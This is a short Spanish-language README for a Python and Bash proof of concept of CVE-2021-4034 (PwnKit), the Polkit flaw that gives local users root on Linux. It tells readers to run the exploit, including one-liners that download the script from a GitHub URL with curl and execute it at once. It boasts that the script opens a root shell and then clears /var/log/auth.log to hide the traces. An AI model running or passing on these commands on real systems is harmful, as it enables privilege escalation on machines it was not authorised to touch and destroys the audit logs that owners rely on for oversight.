
Un PoC en python3 y bash para CVE-2021-4034 por Kim Schulz
██████╗ ██╗ ██╗██╗ ██╗███╗ ██╗███████╗██████╗
██╔══██╗██║ ██╔╝██║ ██║████╗ ██║██╔════╝██╔══██╗
██████╔╝█████╔╝ ██║ █╗ ██║██╔██╗ ██║█████╗ ██████╔╝
██╔═══╝ ██╔═██╗ ██║███╗██║██║╚██╗██║██╔══╝ ██╔══██╗
██║ ██║ ██╗╚███╔███╔╝██║ ╚████║███████╗██║ ██║
╚═╝ ╚═╝ ╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝
Un PoC en Python3 y BASH para CVE-2021-4034 por Kim Schulz
Este es un PoC simple para el error de Polkit recientemente encontrado llamado PwnKit.
Lo hice tanto como script de bash como de python3, solo por diversión.
El problema es muy simple de explotar, pero tiene consecuencias enormes, ya que fácilmente otorga acceso root en la mayoría de las máquinas Linux donde el atacante tiene acceso de usuario local.
Estos scripts son de ejecución única, así que simplemente haz:
python3 pkwner.py
o
bash pkwner.sh
También puedes ejecutarlo directamente desde un servidor web (por ejemplo, este repositorio de GitHub) mediante:
python3 <(curl https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.py)
o
source <(curl -s https://raw.githubusercontent.com/kimusan/pkwner/main/pkwner.sh))
En ambos casos debería verse algo así:
y

El script creará algunos archivos y carpetas, pero se limpiará solo cuando se abra el shell root; incluso limpiará /var/log/auth.log (porque ¿por qué no?).